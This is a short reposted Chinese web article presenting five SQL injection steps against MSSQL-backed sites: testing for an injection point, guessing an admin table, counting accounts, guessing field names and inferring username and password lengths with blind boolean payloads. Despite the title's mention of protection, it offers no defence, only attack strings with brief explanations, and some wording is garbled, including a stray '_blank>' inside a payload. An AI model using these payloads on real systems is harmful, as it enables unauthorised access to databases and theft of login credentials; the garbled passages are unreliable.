SQL注入语句五例[MSSQL防范]
本文“SQL注入语句五例[MSSQL防范]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:
SQL注入语句是学习SQL语句历程中需求掌握的知识,下面就为您介绍5个尺度的SQL注入语句,但愿对您理解SQL注入语句有所帮忙.
1.判断有没有注入点
; and 1=1 and 1=2
2.猜表普通的表的名称无非是admin adminuser user pass password 等..
and 0<>(select count(*) from *)
and 0<>(select count(*) from admin) ---判断能否存在admin这张表
3.猜帐号数目 假如碰到0< 返回精确页面 1<返回错误页面阐明帐号数目就是1个
and 0<(select count(*) from admin)
and 1<(select count(*) from admin)
4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称.
and 1=(select count(*) from admin where len(*)>0)--
and 1=(select count(*) from admin where len(用户字段名称name)>0)
and 1=(select count(*) from admin where len(_blank>密码字段名称password)>0)
5.猜解各个字段的长度 猜解长度就是把>0变更 直到返回精确页面为止
and 1=(select count(*) from admin where len(*)>0)
and 1=(select count(*) from admin where len(name)>6) 错误
and 1=(select count(*) from admin where len(name)>5) 精确 长度是6
and 1=(select count(*) from admin where len(name)=6) 精确
and 1=(select count(*) from admin where len(password)>11) 精确
and 1=(select count(*) from admin where len(password)>12) 错误 长度是12
and 1=(select count(*) from admin where len(password)=12) 精确
以上是“SQL注入语句五例[MSSQL防范]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
本文地址: | 与您的QQ/BBS好友分享! |